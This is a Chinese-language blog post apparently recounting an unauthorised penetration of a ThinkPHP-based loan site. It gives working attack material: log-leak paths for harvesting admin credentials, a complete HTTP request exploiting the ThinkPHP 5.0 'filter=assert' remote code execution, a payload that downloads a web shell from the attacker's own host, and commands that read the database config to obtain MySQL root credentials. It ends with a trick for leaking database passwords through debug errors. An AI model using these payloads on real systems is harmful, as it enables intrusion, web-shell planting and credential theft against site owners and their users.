记一个ThinkPHP框架的渗透实战
时间:2022-02-08 09:38
下面thinkphp框架教程栏目将给大家分享一个ThinkPHP框架渗透实战,希望对需要的朋友有所帮助!
信息收集
找到一个网站 http://x.x.x.x/ 下面开始对他进行渗透
首先使用nmap对受害服务器开放的端口扫描探测端口
可以看到开放的端口如下
端口就是应用程序在计算机通信中的唯一识别id,通过端口我们就能知道受害服务器开放了什么服务
如3306是mysql并开启了外联,接下来我们对端口访问看看具体开放了什么服务
8080开放了phpmyadmin一款php连接mysql工具我们可以利用他爆破mysql密码
8082是一个贷款首页
随便输入一个不存在的路由然后查看错误信息如http://x.x.x.x/gfvhf
成功报错:thinkphp框架的版本是5.1.7(这个版本有注入漏洞)
8084是一个后台继续收集
8092是一个后台,因为部署不规范存在thinkphp日志泄露,路径 http://x.x.x.x:8092/runtime/log/202112/19.log 可以到里面查看到管理员登录过的账号密码。
这里说一下黑产使用thinkphp框架因为运维半吊子很有可能有thinkphp日志泄露
tp5-6 payload: 域名/runtime/log/202112/19.log (后面的202112/19.log是根据当前日期变化的)
tp3 payload: 域名 /Application/Runtime/Logs/Home/21_12_19.log (后面的21_12_19.log是根据当前日期变化的)
8083端口使用的thinkphp版本是5.0.15,5.0.15版本的利用条件低挑软柿子捏就这个吧
信息收集完毕精准打击
打开burp,然后使用抓包,然后将数据包转发到burp的Repeater模块下,将抓包内容替换成如下内容
漏洞原理就不做详细讲解了,没个php架构层是听不懂的。简单描述一下就是一个变量覆盖造成代码执行
thinkphp5漏洞poc可参考 https://y4er.com/post/thinkphp5-rce/
下面数据包内容是触发漏洞让服务器执行phpinfo()
POST /index.php?s=captcha&echod=phpinfo() HTTP/1.1 Host: x.x.x.x Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.57 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: pmaCookieVer=5; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=iar4j14536rat57j1d5018qjtt8vj69g Content-Type:application/x-www-form-urlencoded Content-Length: 77 _method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=echod
执行成功,可以看到php的一些详细信息
下面开始写入shell将请求头替换成:
POST /index.php s=captcha&echod=copy('http://x.x.x.x/2.txt','t2.php') HTTP/1.1
意思是将我服务器上远程的shell文件http://x.x.x.x/2.txt下载,写入到当前web目录下的t2.php
但我访问t2.php,出现404猜测应该是当前目录没有写权限
于是尝试给写权限:
POST /index.php?s=captcha&echod=chmod('./',0777) HTTP/1.1
发现还是写不了shell,php权限很低。
将chmod('./',0777) 替换成readfile('../application/database.php')读取数据库配置文件。发现成功获取到mysql账号密码。
使用我们之前发现的phpmyadmin服务登录然后mysql开启外联
使用mysql管理工具连接,发现一堆数据库。并且mysql直接是root权限,可以对服务器进行提权(内网横向渗透)等。反正外网以经开了一个口子,这里我就不深入了。
总结
总结一下我自己摸索出来的一些思路:thinkphp在开启debug模式下如果服务器开启了数据库外联,可以通过爆破mysql服务发送大量请求(让mysql堵塞),使thinkphp连接mysql超时就会报连接异常错误,并将mysql账号密码输出到页面上。
推荐学习:《thinkphp视频教程》
以上就是记一个ThinkPHP框架的渗透实战的详细内容,更多请关注gxlsystem.com其它相关文章!